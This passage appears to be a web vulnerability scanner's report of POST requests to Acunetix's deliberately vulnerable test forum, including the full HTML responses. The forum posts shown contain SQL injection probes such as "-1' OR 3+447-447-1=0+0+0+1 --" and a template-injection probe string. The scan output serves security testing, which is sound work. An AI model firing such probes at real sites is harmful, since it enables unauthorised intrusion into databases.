2+689-689-1=0+0+0+1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=69 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=69 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=69 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:57 GMT Content-Length: 3083 |
Response Body - size: 3,083 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:19 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3+689-689-1=0+0+0+1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=7 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 415 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:48 GMT Content-Length: 3164 |
Response Body - size: 3,164 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%> </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%> </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%> - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=70 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=70 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=70 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:57 GMT Content-Length: 3081 |
Response Body - size: 3,081 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:19 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3*2<(0+5+689-689)</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=71 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=71 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=71 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:57 GMT Content-Length: 3081 |
Response Body - size: 3,081 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:20 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3*2>(0+5+689-689)</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=72 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=72 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=72 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:57 GMT Content-Length: 3088 |
Response Body - size: 3,088 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:20 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 2+447-447-1=0+0+0+1 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=73 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=73 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=73 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:57 GMT Content-Length: 3088 |
Response Body - size: 3,088 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:21 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3+447-447-1=0+0+0+1 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=74 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=74 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=74 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:57 GMT Content-Length: 3086 |
Response Body - size: 3,086 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:22 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3*2<(0+5+447-447) -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=75 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=75 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=75 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:57 GMT Content-Length: 3086 |
Response Body - size: 3,086 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:38 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3*2>(0+5+447-447) -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div 